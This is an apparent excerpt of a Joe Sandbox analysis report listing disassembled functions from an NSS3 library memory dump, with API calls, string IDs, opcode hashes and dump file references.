                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C47C064
                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C47C07B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C477310), ref: 6C4789B8
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C477310), ref: 6C4789E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C478A00
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: CERT_CopyRDN.NSS3(00000004,00000000,6C477310,?,?,00000004,?), ref: 6C478A1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C478A74
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D2C
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C47C09B,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C47C087,00000000,000000B0,?), ref: 6C471D54
                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C47C0AD
                                                                                                                                                                                                                                                      • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C47C0C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C482DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C47C0D2,6C47C0CE,00000000,-000000D4,?), ref: 6C482DF5
                                                                                                                                                                                                                                                        • Part of subcall function 6C482DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C47C0CE,00000000,-000000D4,?), ref: 6C482E27
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47C0D6
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47C0E3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3955726912-0
                                                                                                                                                                                                                                                      • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                      • Instruction ID: d96291ca8283d65bb23e2111cc07ec3aa8bd21dc9474125ec5a8b74af5304087
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321A1B664010567FB20EAA1AC85FFB32BC9B4175DF084138FD04DA746FB22D91982F2
                                                                                                                                                                                                                                                      Function 6C472E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                                                      • PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                                                      • PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C472EB6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C472EC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3332421221-0
                                                                                                                                                                                                                                                      • Opcode ID: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                                                      • Instruction ID: 9169e12b6f706f492796311e7c3b0f29afafca67da032e6de53cfc78c40d0d8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5521F576A44201E7EF219B25EC09EDA3A749B5235EF050034ED1886B11FB32EA59C7E5
                                                                                                                                                                                                                                                      Function 6C45FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45FD18
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45FD5F
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD89
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD99
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C45FE3C
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45FEE3
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45FEEE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                      • String ID: simple
                                                                                                                                                                                                                                                      • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                      • Opcode ID: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                                                      • Instruction ID: e4fd46e6f641e32371c2988382bac3a9784669e99c3b23c9818e64388577747a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 029181B0B022058FEB04CF55C880EAAB7B1FF85319F64C568D8199BB52E731E865CB91
                                                                                                                                                                                                                                                      Function 6C465CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C465EC9
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C465EED
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C465ED1
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C465EE0
                                                                                                                                                                                                                                                      • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C465E64
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C465EBE
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C465EDB
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C465EC3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                      • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                      • Opcode ID: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                                                      • Instruction ID: 8708bf872cec13717263f1a55730c1075aae9207930775d73f988f0fb4397601
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C81BE30B056129BEB19CF66C848FAA7770BF4130DF288269D8155BF9AD730E842CBD1
                                                                                                                                                                                                                                                      Function 6C44DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DDF9
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE68
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE97
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C44DEB6
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DF78
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                                                      • Instruction ID: 10d36a4a40e43641da74d4cb83dc107e442ab20182d041461ac400cb8fe125c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE8180716047009FE714DF65C880F6A77E1EF85309F24C86DE99A8BB91E731E846CB92
                                                                                                                                                                                                                                                      Function 6C3FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FCFF3
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FD02B
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C3FB999), ref: 6C3FD041
                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3FB999), ref: 6C54972B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                                                      • Instruction ID: 7582f84199e9775e2d9788e13f958186fad4a7cc50a925fb321e5cc4ce629708
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1613771A042108BD310CF29CC41BAABBF5EF95318F1885ADE4489BB42D376E947CBE1
                                                                                                                                                                                                                                                      Function 6C4FFFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C500113
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500130
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000040), ref: 6C50015D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C5001AF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD056,00000000), ref: 6C500202
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C500224
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500253
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                                                      • String ID: exporter
                                                                                                                                                                                                                                                      • API String ID: 712147604-111224270
                                                                                                                                                                                                                                                      • Opcode ID: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                                                      • Instruction ID: 2b1b9842bc1bc29f616eb6b20addfcdedeec07d5ec8cfaf4a58f863616482d5e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD61F571E007899BEF118FA4CC04BEE77B6BFC4308F144529ED1A96A62EB31A954C791
                                                                                                                                                                                                                                                      Function 6C4D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C4D536F,00000022,?,?,00000000,?), ref: 6C4D4E70
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C4D4F28
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C4D4F8E
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C4D4FAE
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4FC8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                      • String ID: %s=%c%s%c$%s=%s$oSMl"
                                                                                                                                                                                                                                                      • API String ID: 2709355791-1484050375
                                                                                                                                                                                                                                                      • Opcode ID: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
                                                                                                                                                                                                                                                      • Instruction ID: 3f7a00d608988b5663deb7cce9859a559b37e72c5f25601889a3d6d9d7e3ae3c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85515C31A041469BEF01DB69C8B0FFF7BF19F4638AF1A5129E894A7B40D335B8058791
                                                                                                                                                                                                                                                      Function 6C4FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEF6D
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFE4
                                                                                                                                                                                                                                                      • htonl.WSOCK32(?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFF1
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6C51A4A1,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF00B
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF027
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
